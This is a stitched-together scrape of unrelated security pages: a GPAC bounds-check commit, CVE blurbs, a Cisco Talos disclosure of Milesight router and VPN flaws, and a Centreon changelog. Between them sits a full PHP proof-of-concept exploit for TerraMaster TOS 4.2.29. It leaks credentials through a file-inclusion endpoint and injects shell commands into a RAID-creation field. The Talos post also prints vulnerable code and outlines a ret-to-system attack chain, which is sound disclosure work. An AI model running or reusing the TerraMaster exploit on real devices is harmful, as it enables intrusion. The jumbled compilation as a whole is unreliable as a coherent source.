Heap-based Buffer Overflow in GitHub repository gpac/gpac prior to v2.3.0-DEV.

Skip to content

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    
    *   Explore
    *   All features
    *   Documentation
    *   GitHub Skills
    *   Blog
    
*   *   For
    *   Enterprise
    *   Teams
    *   Startups
    *   Education
    
    *   By Solution
    *   CI/CD & Automation
    *   DevOps
    *   DevSecOps
    
    *   Case Studies
    *   Customer Stories
    *   Resources
    
*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
    *   Repositories
    *   Topics
    *   Trending
    *   Collections
    
*   Pricing

*   Notifications
*   Fork 450

*   Code
*   Issues 18
*   Pull requests 3
*   Wiki
*   Security
*   Insights

Permalink

Showing **1 changed file** with **5 additions** and **0 deletions**.

@@ -946,6 +946,11 @@ static void gf\_m2ts\_process\_tdt\_tot(GF\_M2TS\_Demuxer \*ts, GF\_M2TS\_SECTION\_ES \*tdt

return;

}

  

if (data\_size < 5) {

GF\_LOG(GF\_LOG\_ERROR, GF\_LOG\_CONTAINER, ("\[MPEG-2 TS\] Section data size too small to read date (len: %u)\\n", data\_size));

return;

}

  

/\*UTC\_time - see annex C of DVB-SI ETSI EN 300468\*/

/\* decodes an Modified Julian Date (MJD) into a Co-ordinated Universal Time (UTC)

See annex C of DVB-SI ETSI EN 300468 \*/

**0 comments on commit d067ab3**

Please sign in to comment.

CVE-2023-0819: mpeg2ts: add section size check (#2395) · gpac/gpac@d067ab3

A vulnerability was found in DPDK versions 18.05 and above. A missing check for an integer overflow in vhost_user_set_log_base() could result in a smaller memory map than requested, possibly allowing memory corruption.

'CVE-2020-10722?cve=title' is not a valid bug number nor an alias to a bug.

Please press **Back** and try again.

CVE-2020-10722: Invalid Bug ID

In all, Cisco Talos is releasing 22 security advisories today, nine of which have a CVSS score greater than 8, associated with 69 CVEs.

Thursday, July 6, 2023 11:07

*   Cisco Talos discovered 17 vulnerabilities (63 CVEs) in the Milesight UR32L router and five vulnerabilities (six CVEs) in the Milesight MilesightVPN remote access solution software.
*   An attacker could exploit the vulnerabilities discovered to completely compromise the UR32L and MilesightVPN.
*   This post presents an attack scenario in which the UR32L is only reachable through the MilesightVPN remote access solution. The blog explains how an attacker could exploit the MilesightVPN and then fully compromise the UR32L.

Cisco Talos recently discovered several vulnerabilities in Milesight‘s UR32L – an ARMv7 Linux-based industrial cellular router — and Milesight’s MilesightVPN, a remote access solution for Milesight devices.

In all, Cisco Talos is releasing 22 security advisories today, nine of which have a CVSS score greater than 8, associated with 69 CVEs. Talos is disclosing these vulnerabilities despite no official fix from Milesight, in adherence to Cisco’s vulnerability disclosure policy. Milesight did not respond appropriately during the 90-day period as outlined in the policy.

The MilesightVPN is the remote access solution for Milesight devices not directly exposed to the internet. The MilesightVPN will perform this through a VPN system, making the VPN setup for the devices and the administrator easy. The MilesightVPN provides an HTTP admin page to monitor devices’ tunnel connection to the MilesightVPN itself and generate VPN configuration to join devices’ VPNs. By default, the MilesightVPN binds the HTTP server ports and the one VPN port on all interfaces. This software must be installed on a server machine reachable by the administrator and devices. Because of this, the most popular setup for administrator is to expose the MilesightVPN to the internet.

The Milesight UR32L is an industrial router that offers cellular capabilities. The router supports multiple users with different permissions. It offers a shell with restricted capabilities access. And many common industrial router features and functionalities. The Milesight UR32L does not include the ability to obtain and act with root privileges.

**Attack scenario overview**

In this blog post, Talos will present an attack scenario in which an adversary targets the Milesight UR32L, where the router is not exposed to the internet and instead uses a VPN tunnel for providing access to its internal network and the router itself. We considered the scenario where the device is managed through MilesightVPN. This software must be installed on a machine that is reachable by the UR32L router and the administrator. For the purposes of this post, we assume the MilesightVPN server is exposed to the internet.

MilesightVPN uses OpenVPN as the underlying VPN system. It is an excellent choice to use a well-established VPN system. OpenVPN is a well-known, tested VPN technology, which means it is less likely to have major security issues. But the MilesightVPN creates services around the OpenVPN tunnel like an HTTP server to monitor the connections and to generate OpenVPN configuration for joining the device’s VPN. By default, the MilesightVPN binds the HTTP server ports and the OpenVPN one on all interfaces. So, if the MilesightVPN is accessible on the internet, those services are by default accessible, too.

The UR32L has its own HTTP server; which allows users to manage the router configuration. We are also assuming the UR32L’s HTTP server is only accessible from the VPN and the MilesightVPN server is the only node that can generate a VPN configuration.

_An illustration of the proposed attack scenario._

The graphic below includes only the vulnerabilities relevant to this proposed attack scenario. This graphic shows the steps that an attacker could take to obtain root access to a Milesight UR32L:

**Attack walkthrough**

After locating the IP address of the MilesightVPN server, the attacker still cannot log in to the HTTP admin page due to the lack of valid credentials. The HTTP server login page of MilesightVPN looks like this:

From this point, an attacker could exploit TALOS-2023-1701 (CVE-2023-22319) to bypass the login and access the admin web pages on MilesightVPN. This vulnerability is a SQL injection in the _LoginAuth_ function responsible for checking the provided credentials. The check uses SQL without a prepared statement or any form of sanitization. The _LoginAuth_ code is shown below:

        function LoginAuth(res,postdata,connection){ 
            console.info('#######log.node:loginauth start'); 
            var sha512=crypto.createHash('sha512'); 
            sha512.update(postdata.pwd); 
            var pwd=sha512.digest('hex'); 
    [1]     $sql="select * from user where user='"+postdata.user+"' and passwd='"+pwd+"'"; 
    [2]     connection.query($sql).then(function(data){ 
                var result={}; 
                if(data['error']) 
                { 
                    [...] 
                } 
                else 
                { 
                    if(data['result'].length>0) 
                    { 
                        var dt=data['result']; 
                        result['status']=1; 
                        var token=generateToken(dt[0]['user']); 
                        var exp=new Date(
                            new Date().getTime()+
                                expiretime*1000).toUTCString(); 
                        res.setHeader('Set-Cookie',['token='+token]); 
                        console.info('#######log.node:loginauth success'); 
                        res.write(JSON.stringify(result)); 
                        res.end(); 
                    } 
                    else 
                    { 
                        [...] 
                    } 
                } 
            }); 
        } 
    

At _[1],_ the function composes, the SQL query for checking if the username and password provided correspond to the one of an existing user. Then, at _[2]_, the query is executed, if the resulting table is not empty a JWT, corresponding to the first matched user, is crafted and placed in the response header as the value of _Set-Cookie_. This function is vulnerable to a SQL injection vulnerability because the "preparation" of the query string is performed through string concatenation instead of a prepared statement. This SQL injection can allow an attacker to bypass the authentication of the HTTP server and gain admin access.

After bypassing the login page, an attacker would be presented with the following interface. The example below includes an interface with multiple devices registered and a single device that has an active connection.

From here, an attacker can glean information about the devices connected to the server and their IPs. Furthermore, it is possible to obtain an OpenVPN configuration file to join the VPN tunnel and communicate with the devices that were previously unreachable. The attacker can now communicate with all devices in the VPN. The following image is the HTTP server login page of the Milesight UR32L router:

From here, several attack paths are possible. TALOS-2023-1697 (CVE-2023-23902) is a pre-authentication stack-based buffer overflow that can lead to arbitrary remote code execution (RCE).

The attacker's only requirement is to be able to communicate with the router's HTTP server. This vulnerability is a pre-authentication, stack-based buffer overflow in the _decrypt_string_ function of the _uhttpd_ binary, the UR32L’s HTTP server binary. This function is responsible for decrypting the login password provided for the webpage login. The password sent from the browser is first AES-encrypted and then Base64-encoded. The _decrypt_string_ will Base64 decode and then AES decrypt the password.

The _uhttpd_ binary is not a Position Independent Executable (PIE), meaning that the binary is always loaded at the same virtual memory addresses, but the libraries are Position Independent Code (PIC). This makes it possible for an attacker to perform a code reuse attack using the binary code without any information leaks unless the attacker needs to reuse some of the libraries' code. Furthermore, the code reuse attack scenario is the path of least resistance for exploitation because no stack canary is used in this binary.

The binary is executed as root and makes use of functions such as _system_ and _popen_, as such, one of the options would be to mount an attack aiming to execute OS commands.

The following is a code snippet of the _uhttpd’ decrypt_string_:

    void decrypt_string(
        char *b64_encrypted_password,
        char *decrypted_password,
        size_t size_decrypted_password)
    { 
        [...] 
        uchar stack_decrypted_string [72]; 
        [... init the AES_key variable] 
        [... init the AES_IV variable] 
        [... calculate the __size variable value ...] 
        base64_decoded_string_start = (uchar *)malloc(__size); 
        [...] 
        memset(base64_decoded_string_start,0,__size); 
        processed_len = 0; 
        base64_decode_string_cursor = base64_decoded_string_start; 
        do { 
            // this check allow to base64 decode the string before decrypting it 
            if ((password_len_ - padding) <= processed_len) { 
                *base64_decode_string_cursor = '\0'; 
                ctx = EVP_CIPHER_CTX_new(); 
                [... check error ...] 
                cipher_type = EVP_aes_128_cbc(); 
                processed_len = EVP_DecryptInit_ex(
                    ctx,
                    cipher_type,
                    (ENGINE *)0x0,
                    AES_key,
                    AES_IV); 
                [... check error ...] 
    [1]         processed_len = EVP_DecryptUpdate(
                    ctx,
                    stack_decrypted_string,
                    &output_len,
                    base64_decoded_string_start,
                    (base64_decode_string_cursor + 
                        (-1 - base64_decoded_string_start)));                              
                [... check error ...] 
                processed_len = output_len; 
                iVar3 = EVP_DecryptFinal_ex(
                    ctx,
                    stack_decrypted_string + output_len,&output_len); 
                [... check error ...] 
                processed_len = processed_len + output_len; 
                EVP_CIPHER_CTX_free(ctx); 
                stack_decrypted_string[processed_len] = '\0'; 
                EVP_cleanup(); 
                ERR_free_strings(); 
                free(base64_decoded_string_start); 
    [2]         strncpy(
                    decrypted_password,
                    (char*)stack_decrypted_string,
                    size_decrypted_password);                 
                return; 
            } 
            [...] 
    [3]    	[... base64 decode ...]                 
        } while( true ); 
    } 
    

This function has three parameters: the _b64_encrypted_password_ parameter is the AES-encrypted and Base64-encoded password string that will be Base64 decoded and then AES decrypted; _decrypted_password_ is the destination buffer where the decoded and decrypted password will be copied;  _size_decrypted_password_ is the size of the _decrypted_password_ buffer. At _[3]_ the _b64_encrypted_password_ string is Base64 decoded and then, at _[1],_ the decoded value is AES decrypted into stack_decrypted_string, a 72-byte long stack buffer. Eventually, at _[2],_ _size_decrypted_password_ bytes will be copied from the _stack_decrypted_string_ buffer into the decrypted_password buffer.

In the _decrypted_password_ only _size_decrypted_password_ bytes will be copied, which will prevent any type of buffer overflow in the _decrypted_password_ buffer.

At _[1]_ the _OpenSSL's EVP_DecryptUpdate_ function will perform the AES decryption of the Base64 decoded user-controlled data into the _stack_decrypted_string_ stack buffer. Because the _stack_decrypted_string_ stack buffer is fixed in size and the decrypted string, provided by a user, can be greater in length than the stack buffer. This can lead to a buffer overflow in the _stack_decrypted_string_ buffer.

Essentially, the login API accepts the password as the Base64 encoding of the AES encryption of the password content. This function is used to decode the Base64 string and then AES decrypts it to obtain the actual password value.  The vulnerability is that the password can overflow a stack buffer overwriting the stack content, including the stored return address.

The exploitation of this vulnerability becomes easier because of the epilogue of this function:

      strncpy(
          decrypted_password,
          (char*)stack_decrypted_string,
          size_decrypted_password);          
      return; 
    

The _decrypted_password_ is a buffer in the function caller stack space where the decoded and decrypted password is saved. In assembly, this looks like:

    ldr r0, [sp,#0xc]  
    bl strncpy  
    add sp, sp, #0x84  
    pop {r4,r5,r6,r7,r8,r9,r10,r11,pc} 
    

The function that copies the plain text password into the _decrypted_password_ array, which is also the last function call before returning to the caller, is _strncpy_. The r0 register is used for passing the first argument of the function; in the case of _strncpy_, _r0_ points to the destination buffer. After the _strncpy_ function call r0 will point to the beginning of the plaintext password.

The fact that the vulnerability considered is a stack buffer overflow, the binary does not have a stack canary, the binary is not PIE and uses the _system_ function in combination with the fact that we control the content of what r0 points to, makes the exploitation straightforward. An attacker could overwrite the return address making the function return to the _system_ function and controlling the executed shell command by placing the command to execute at the beginning of the plaintext password payload, as shown in the gdb screenshot below.

The _pc_ is the last instruction of the _decrypt_string_ function and the return address was overwritten with the system plt entry, know because the binary is not PIE, and the _r0_ registry points to the _controllable_ string. So, the _decrypt_string_ returning will execute _system(“controllable”)_.

**Vulnerability Details**

The following vulnerabilities are command injection issues in Milesight UR32L. These vulnerabilities exist in different functionalities of the router. An attacker could exploit these vulnerabilities by sending a specially crafted network packet to a targeted device:

*   TALOS-2023-1694 (CVE-2023-23550)
*   TALOS-2023-1698 (CVE-2023-22306)
*   TALOS-2023-1699 (CVE-2023-22659)
*   TALOS-2023-1706 (CVE-2023-24519 - CVE-2023-24520)
*   TALOS-2023-1710 (CVE-2023-24582 - CVE-2023-24583)
*   TALOS-2023-1711 (CVE-2023-22365)
*   TALOS-2023-1712 (CVE-2023-22299)
*   TALOS-2023-1713 (CVE-2023-24595)
*   TALOS-2023-1714 (CVE-2023-22653)
*   TALOS-2023-1723 (CVE-2023-25582 - CVE-2023-25583)

There are also several vulnerabilities in the UR32L that could lead to a buffer overflow. An attacker could trigger these vulnerabilities by sending a specially crafted HTTP request or network request to the targeted device, depending on the specific vulnerability.

*   TALOS-2023-1697 (CVE-2023-23902)
*   TALOS-2023-1715 (CVE-2023-24018)
*   TALOS-2023-1716 (CVE-2023-25081 - CVE-2023-25124)
*   TALOS-2023-1718 (CVE-2023-24019)

TALOS-2023-1705 (CVE-2023-23546) is a misconfiguration vulnerability in the Milesight UR32L that could lead to an attacker obtaining increased privileges on the device. The adversary, in this case, would need to carry out a man-in-the-middle attack to exploit this vulnerability.

There is also an access violation vulnerability — TALOS-2023-1696 (CVE-2023-23571) — that could lead to a denial-of-service if the attacker sends the device a specially crafted network request. TALOS-2023-1695 (CVE-2023-23547) can also be exploited with a specially crafted network request, but in this case, can lead to arbitrary file read.

Talos also discovered five vulnerabilities in the MilesightVPN:

*   TALOS-2023-1700 (CVE-2023-22844): Authentication bypass vulnerability
*   TALOS-2023-1701 (CVE-2023-22319): SQL injection vulnerability
*   TALOS-2023-1702 (CVE-2023-23907): Directory traversal vulnerability
*   TALOS-2023-1703 (CVE-2023-22371): Command injection vulnerability
*   TALOS-2023-1704 (CVE-2023-24496 - CVE-2023-24497): Cross-site scripting vulnerability

**Coverage**

The following Snort rules will detect exploitation attempts against these vulnerabilities: 61206 – 61208, 61212, 61255 - 61258, 61266 - 61269, 61395 - 61397. Additional rules may be released in the future and current rules are subject to change, pending additional vulnerability information. For the most current rule information, please refer to your Cisco Secure Firewall or Snort.org.

Taking over Milesight UR32L routers behind a VPN: 22 vulnerabilities and a full chain

TerraMaster TOS version 4.2.29 suffers from a remote code injection vulnerability leveraging a local file inclusion vulnerability.

    =============================================================================================================================================| # Title     : TerraMaster TOS 4.2.29 Code Injection Vulnerability                                                                         || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits)                                                            || # Vendor    : https://www.terra-master.com/global/alltos/                                                                                 |=============================================================================================================================================POC :[+] Dorking İn Google Or Other Search Enggine.[+] uses the CURL to Allow remote command .[+] Line 138 set your target .[+] save code as poc.php .[+] USage : cmd => c:\www\test\php poc.php [+] PayLoad :<?phpclass TerraMasterExploit{    private $targetUri;    private $data = [];    private $terramaster = [];    public function __construct($targetUri)    {        $this->targetUri = rtrim($targetUri, '/') . '/';    }    public function getData()    {        // Get the data by exploiting the LFI vulnerability through vulnerable endpoint `api.php?mobile/webNasIPS`        $response = $this->sendRequest('POST', 'module/api.php?mobile/webNasIPS', ['User-Agent' => 'TNAS']);                if ($response && strpos($response, 'webNasIPS successful') !== false) {            // Parse the JSON response and get the data            $resJson = json_decode($response, true);            if (!empty($resJson['data'])) {                $this->data['password'] = trim(explode('SAT', explode('PWD:', $resJson['data'])[1])[0]);                $this->data['mac'] = trim(explode('"', explode('mac":"', $resJson['data'])[1])[0]);                $this->data['key'] = substr($this->data['mac'], 6, 6); // last three MAC address entries                $this->data['timestamp'] = time();                // derive signature                $this->data['signature'] = $this->tosEncryptStr($this->data['key'], $this->data['timestamp']);            }        }    }    private function tosEncryptStr($key, $strToEncrypt)    {        $id = $key . $strToEncrypt;        return md5($id);    }    public function executeCommand($cmd)    {        // Execute RCE using vulnerable endpoint `api.php?mobile/createRaid`        $diskstring = $this->generateRandomString(4, 8);        $headers = [            'User-Agent' => 'TNAS',            'Authorization' => $this->data['password'],            'Signature' => $this->data['signature'],            'Timestamp' => $this->data['timestamp']        ];        $this->sendRequest('POST', 'module/api.php?mobile/createRaid', [            'raidtype' => ';' . $cmd,            'diskstring' => $diskstring        ], $headers);    }    public function getTerramasterInfo()    {        // get Terramaster CPU architecture and TOS version        $response = $this->sendRequest('GET', 'tos/index.php?user/login');        if ($response) {            preg_match('/ver=.+?"/', $response, $matches);            if ($matches) {                $version = $matches[0];                // check if architecture is ARM64 or X64                if (strpos($version, '_A') !== false) {                    $this->terramaster['cpu_arch'] = 'ARM64';                } elseif (strpos($version, '_S') !== false || strpos($version, '_Q') !== false) {                    $this->terramaster['cpu_arch'] = 'X64';                } else {                    $this->terramaster['cpu_arch'] = 'UNKNOWN';                }                // strip TOS version number and remove trailing double quote.                $this->terramaster['tos_version'] = rtrim(substr($version, strpos($version, '.0_') + 3), '"');            }        }    }    public function check()    {        $this->getTerramasterInfo();        if (empty($this->terramaster)) {            return 'Safe';        }        if (version_compare($this->terramaster['tos_version'], '4.2.29', '<=') === 0) {            return "Vulnerable: TOS version is {$this->terramaster['tos_version']} and CPU architecture is {$this->terramaster['cpu_arch']}.";        }        return "Safe: TOS version is {$this->terramaster['tos_version']} and CPU architecture is {$this->terramaster['cpu_arch']}.";    }    public function exploit()    {        $this->getData();        if (empty($this->data)) {            throw new Exception('Cannot retrieve the leaked data.');        }        echo "Executing exploit...\n";        // Example command to execute        $this->executeCommand('whoami'); // Replace 'whoami' with desired command    }    private function sendRequest($method, $uri, $data = [], $headers = [])    {        $url = $this->targetUri . $uri;        $options = [            CURLOPT_RETURNTRANSFER => true,            CURLOPT_CUSTOMREQUEST => strtoupper($method),            CURLOPT_HTTPHEADER => array_merge(['Content-Type: application/x-www-form-urlencoded'], $headers)        ];        if (strtoupper($method) === 'POST') {            $options[CURLOPT_POSTFIELDS] = http_build_query($data);        } else {            $options[CURLOPT_URL] = $url;        }        $ch = curl_init();        curl_setopt_array($ch, $options);        $response = curl_exec($ch);        curl_close($ch);        return $response;    }    private function generateRandomString($minLength, $maxLength)    {        $length = rand($minLength, $maxLength);        return substr(str_shuffle(str_repeat("ABCDEFGHIJKLMNOPQRSTUVWXYZ", $maxLength)), 0, $length);    }}// Usage$exploit = new TerraMasterExploit('http://target-terramaster-url.com');$check = $exploit->check();echo $check . "\n";if (strpos($check, 'Vulnerable') !== false) {    $exploit->exploit();}Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

TerraMaster TOS 4.2.29 Code Injection / Local File Inclusion

This vulnerability allows remote attackers to escalate privileges on affected installations of Centreon. Authentication is required to exploit this vulnerability. The specific flaw exists within the configuration of poller resources. The issue results from the lack of proper validation of a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to escalate privileges to the level of an administrator. Was ZDI-CAN-16335.

**Introduction​**

You can find in this chapter all changelogs concerning **Centreon Core**.

> It is very important when you update your system to refer to this section in order to learn about behavior changes or major changes that have been made on this version. This will let you know the impact of the installation of these versions on the features you use or the specific developments that you have built on your platform (modules, widgets, plugins).

If you have feature requests or want to report a bug, please go to our Github

**Centreon Web​****21.10.8​**

Release date: August 3, 2022

**Security​**

*   \[Configuration\] Fixed SQLi vulnerability in escalations configuration
*   \[Configuration\] Fixed XSS vulnerability in escalations configuration

**21.10.7​**

Release date: June 10, 2022

**Bug Fixes​**

*   \[API\] Fixed /monitoring/host endpoint to return service state
*   \[API\] Fixed SQL syntax when retrieving service\_id field
*   \[Business Activity\] Fixed synchronization of configuration with Remote Server
*   \[Configuration\] Fixed export when host group is disabled
*   \[Configuration\] Fixed export when service group is disabled
*   \[Configuration\] Fixed export when service template is disabled
*   \[Core\] Fixed database partitioning issue with MySQL 8
*   \[Dashboard\] Fixed displaying of first service in host reporting dashboard
*   \[Discovery\] Fixed critical error when searching host templates with notification option in mappers configuration
*   \[Install\] Fixed error when installing Centreon with remote DBMS
*   \[Monitoring\] Fixed notification number in legacy pages
*   \[Remote Server\] Fixed synchronization of configuration
*   \[Resource Status\] Fixed color when resources are selected in downtime or acknowledged
*   \[UX\] Fixed timezone when adding a downtime or an acknowledgement
*   \[UX\] Follow user configuration for Date/Time display
*   \[Widget\] The list of pollers is now filtered according to the user's ACLs

**Security​**

*   \[Security\] Fixed RCE in command
*   \[Security\] Fixed SQLi in virtual metrics
*   \[Security\] Sanitize and bind "hostgroups" queries
*   \[Security\] Sanitize and bind "meta\_service" related queries
*   \[Security\] Sanitize and bind "poller" queries
*   \[Security\] Sanitize and bind ACL resources queries

**21.10.6​**

Release date: May 2, 2022

**Bug Fixes​**

*   \[API\] Fixed an issue in the icons API endpoint that always returned 0 for total number of results
*   \[Banner\] Fixed display of empty skeleton
*   \[Charts\] Fixed slowdown in graphics display
*   \[Configuration\] Fixed an issue that caused the export of the poller configuration files to fail when a disabled host template was used
*   \[Configuration\] Fixed checkbox selection after enabling/disabling a contact via icons
*   \[Core\] Fixed an issue where proxy settings were saved with empty parameters
*   \[Install\] Fixed an issue in database user creation with remote DBMS
*   \[Monitoring\] Fixed display of acknowledgement information in legacy Resources Status pages
*   \[Monitoring\] Fixed relation issue for recurrent downtimes
*   \[Reporting\] Fixed an issue where MBI graphs reports were not using graph templates
*   \[Resources Status\] Fixed default settings for acknowledgments and downtimes
*   \[Resources Status\] Fixed display of acknowledgements comments
*   \[Resources Status\] Fixed Hard/Soft translation
*   \[Resources Status\] Fixed monitoring command that was not displayed in Resources Status Details panel
*   \[UX\] Fixed display of date with UTC timezone in datepickers
*   \[UX\] Improved interface response time if CEIP is enabled but the browser does not have internet access

**Security Fixes​**

*   \[Apache\] Fixed cookies with missing or contradictory properties
*   \[Apache\] HTTPS Apache configuration now includes HSTS
*   \[Configuration\] Fixed an SQL injection issue in Configuration > Poller > Resources
*   \[Core\] Passwords are now obfuscated in the page's HTML source
*   \[Core\] Replace Math.random by Crypto JS API
*   \[PHP\] Disabled allow\_url\_fopen in PHP

**21.10.5​**

Release date: March 21, 2022

**Security Fixes​**

*   \[Administration\] SQL Injections on ACL group listing
*   \[Administration\] SQL Injection on Knowledge Base configuration form
*   \[Administration\] SQL Injections on LDAP listing
*   \[Configuration\] Command path traversal resulting in RCE on command edition form
*   \[Configuration\] SQL Injection on export configuration
*   \[Configuration\] SQL Injections on SNMP traps edition form
*   \[Core\] RCE in legacy PHP's class autoload
*   \[Monitoring\] SQL Injection on performance curve edition form

**21.10.4​**

Release date: March 3, 2022

**Enhancements​**

*   \[Authentication\] Autologin Validation reinforcement
*   \[Install\] Set broker retry interval to 15s instead of 60s
*   \[Performance\] Improve SQL queries to use index
*   \[Reporting\] Add select2 to hostgroup and servicegroup reporting dashboards
*   \[Resource Status\] Added custom variables definition in URL/Action URL
*   \[Resource Status\] Create new filter on type of status (Hard or Soft)
*   \[Stats\] Manage exception for statistics
*   \[UX\] Add TheWatch url to Centreon footer

**Bug Fixes​**

*   \[APIv2\] Fixed criticality null return for monitoring endpoint
*   \[Apache\] Fixed SNMP MIB import mib with new mod\_security rule definition
*   \[Authentication\] Improve LDAP authentication and authorization
*   \[Authentication\] Remove deadlocks on token deletion
*   \[Configuration\] A regression in the host/host template configuration form caused the inherited macros to be saved as owned by the host/host template instead of being inherited. This can be seen as the loss of orange coloration. To undo this unwanted change, remove the macros from the list and they will be inherited again.
*   \[Configuration\] Contact template properties not exported with the contact
*   \[Configuration\] Fixed an infinite loop in export of configuration
*   \[Configuration\] Fixed an issue in the contact form. When a non-admin user modified another non-admin user, only access groups that were common to both users were kept, other access groups were lost for the second user.
*   \[Configuration\] Fixed an issue in the contact form: when a non-admin user modified a duplicated contact, it resulted in a blank screen
*   \[Configuration\] Wizard doesn't insert anymore old logger configuration
*   \[Monitoring\] Fixed deletion of comments
*   \[Reporting\] Fixed timeperiod selection in dashboards when changing resource
*   \[Resources Status\] Change "resource" by "type" in Resource status filter menu
*   \[Resources Status\] Contents cropped in many tiles in French
*   \[Resources Status\] Fixed display of old downtimes
*   \[Resources Status\] Removed the tooltips on hover for urls
*   \[Resources Status\] Rework Detail panel chip: hostgroup/servicegroup

**Security Fixes​**

*   XSS reflected from plugin's metric output
*   XSS in reporting dashboard

**21.10.3​**

Release date: January 26, 2022

**Bug Fixes​**

*   \[Graph\] Fixed display of additional graph if it came from Resources Status
*   \[Install\] Fixed SQL request syntax error for cron with MySQL 8
*   \[Resources Status\] Fixed display of meta-services
*   \[Resources Status\] Fixed graph unit displayed twice
*   \[Resources Status\] Fixed saving a filter on an existing name
*   \[Resources Status\] Take the default downtime options to set downtime
*   \[UX\] Fixed random disconnection since update to Centreon 21.10

**21.10.2​**

Release note: December 24, 2021

**Enhancements​**

*   \[Administration\] Display the name of the object that has been modified in the detail form of logs
*   \[Authentication\] Removed token display in login debug file
*   \[UI\] The top-counter menu for pollers is now refreshed immediately after enabling the "Export button" in the user's profile

**Bug Fixes​**

*   \[API\] Fixed the access to API is account doesn't have access to GUI
*   \[Authentication\] Fixed LDAP OU quote connection breaking
*   \[CLAPI\] Fixed an issue preventing ACLs from applying on services created with CLAPI
*   \[CLAPI\] Fixed error with LDAP configuration ID
*   \[Configuration\] Fixed SNMP Trap matching with service linked to multiple hosts
*   \[Configuration\] Fixed an issue that caused the Anomaly Detection services to lose their graphs when they were renamed
*   \[Configuration\] Fixed an issue that caused the loss of broker output configuration
*   \[Configuration\] Fixed an issue that prevented from removing the SNMP community (and other fields) from the host form
*   \[Configuration\] Fixed the wizard for adding a new server that did not add it
*   \[Configuration\] Fixed unwanted writes into unexisting file when exporting Traps config at the same time as a trap arrives. Based on PR #9973. Fixes issue #4236.
*   \[MBI\] Fixed CBIS process trying to get contact\_js\_effects column that no longer exists
*   \[Resource Status\] Fixed graph tooltip

**21.10.1​**

Release date: November 29, 2021

**Bug Fixes​**

*   \[Authentication\] Fixed PHP error when debug is enabled with OIDC authentication
*   \[Configuration\] Fixed the list of host template that was not available if the database name was different from the default
*   \[UX\] Non admin user do not have the same submenu subsections
*   \[UX\] Remove "Animation effects" option

**21.10.0​****Enhancements​**

*   \[Authentication\] Improve OIDC support (OpenId Connect)
    *   Add Okta support
    *   Add MS Azure AD / ADFS
    *   Add possibility to define which claim is used for Centreon login
    *   Add possibility to define complete URL for endpoints
    *   Add possibility to use client\_secret\_basic as authentication. Based on PR #9878
    *   Allow to define no redirect URL. Based on PR #9877
    *   Add errors log in /var/log/centreon/login.log
    *   Add possibility to display debug log in /var/log/centreon/login.log
    *   Use proxy if defined
*   \[API\] API versioning is now consistent with Centreon's major release number
*   \[CEIP\] Product Adoption component integration
*   \[Configuration\] The poller management actions are now only available via buttons:
    *   "Add" now leads to the wizard.
    *   "Add (advanced)" leads to the former "Add" action (for experts only).
    *   "Delete" and "Duplicate" are converted into buttons.
    *   "Delete" should normally not be confused with another action.
*   \[Configuration\] The deprecated "Logger" tab of the "Broker configuration" menu has been removed
*   \[Resources Status\] Revamp Search experience
*   \[Resources Status\] Revamp Timeline
*   \[Resources Status\] Add Sticky and Persistent options to ACK in Resource Status
*   \[Resources Status\] Allow detail tiles to be re-ordered for each user
*   \[Resources Status\] Add multi-select to Resources Status listing
*   \[Resources Status\] Add "Last OK" tile within Details panel
*   \[Resources Status\] Persist user selected number of rows displayed
*   \[Resources Status\] Make "duration" as the default second sorting criteria
*   \[Resources Status\] Add link to performance page in detail panel. Based on PR #9822
*   \[Resources Status\] Add Graphs panel for Hosts
*   \[Resources Status\] Add tooltip to explain grayed options
*   \[Resources Status\] Improve Custom Columns Name Display
*   \[Resources Status\] Move Shortcuts from dedicated panel to option within Header
*   \[Resources Status\] Make configure resource icon always visible
*   \[Resources Status\] Improve readability of command line displayed
*   \[UX\] Add Feature Flipping for Resources Status vs Legacy Pages
*   \[UX\] Downtimes can now be scheduled until 2100
*   \[UX\] The poller management action buttons are now hidden on Remote Servers

**Beta enhancements​**

*   \[Configuration\] Administrators can toggle a new button in the Pollers top-counter menu that allows them to export and reload the configuration of all pollers from any page

**Breaking changes​**

> Access to API v2 has been changed. All of the beta endpoints have been migrated to version 21.10. This must be modified by "latest" or by the version of your Centreon platform (v21.10 for example).

For example replace:

    {protocol}://{server}:{port}/centreon/api/beta/login

By:

    {protocol}://{server}:{port}/centreon/api/latest/login

or: By:

    {protocol}://{server}:{port}/centreon/api/v21.10/login

**Performances​**

*   Move to PHP 8.0
*   Preparing Debian 11 support

**Centreon Collect​****21.10.2​**

Release date: June 15, 2022

**Centreon Broker​****Improvements​**

*   Improved the way TCP connections are stored by keeping them in an ordered structure. This should avoid rare connection issues experienced by some users

**Bug fixes​**

*   Fixed an issue that caused broker to crash when a BAM output was configured and the BAM tables did not exist
*   Added a bbdo_version function to the LUA libraries for Stream Connectors developers
*   Scheduled downtimes used to be inserted one at a time, which caused performance issues on platforms with a lot of recurrent scheduled downtimes. They are now injected in bulk inserts to reduce demands on the database and avoid performance issues.
*   Broker crashed when a logger was disabled/off
*   Fixed an issue that could prevent broker from connecting again after the database was stopped to make a LVM snapshot
*   Broker crashed when its configuration included a filter that referred to a module that wasn't loaded

**Centreon Engine​****Improvements​**

*   Removed unnecessary informational log messages regarding Anomaly Detection in the Poller configuration export page

**Bug fixes​**

*   Fixed an issue that caused centengine to send duplicate service status messages to broker. This change will reduce network bandwidth consumption, database activity and disk I/O.
*   Fixed an issue with the way escaped special characters were managed (eg. \\n)
*   Fixed an issue that caused loss of recovery notifications when a downtime end notification was sent before recovery
*   Reviewed the way time period exceptions are handled to fix some issues with the way notifications are managed

**Centreon Perl & SSH Connectors​****Bug fixes​**

*   Fixed an issue that could cause the SSH connector to crash
*   Fixed a memory leak issue in the Perl connector

> As of version 21.10.0, the components of Centreon Collect (Centreon Broker, Centreon Clib, Centreon Engine and Centreon Connectors) are released simultaneously. They are now grouped under this section.

**21.10.1​**

Release date: February 23, 2022

**Centreon Broker​****Improvements​**

